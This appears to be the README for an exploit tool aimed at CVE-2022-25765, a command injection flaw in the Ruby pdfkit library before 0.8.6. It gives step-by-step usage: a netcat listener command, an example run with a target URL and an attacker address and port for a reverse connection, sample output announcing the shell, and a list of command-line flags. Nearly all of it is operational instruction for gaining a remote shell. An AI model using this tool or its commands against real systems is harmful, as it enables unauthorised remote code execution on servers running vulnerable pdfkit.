Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6
See more details about the vulnerability here
Run the netcat on your host:
$ nc -lvnp 1337
Run the exploit (example):
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection
Flags:
-t, --target Address of target in http-format
-a, --addr Address for reverse connect
-p, --port Port for reverse connect, 9001 by default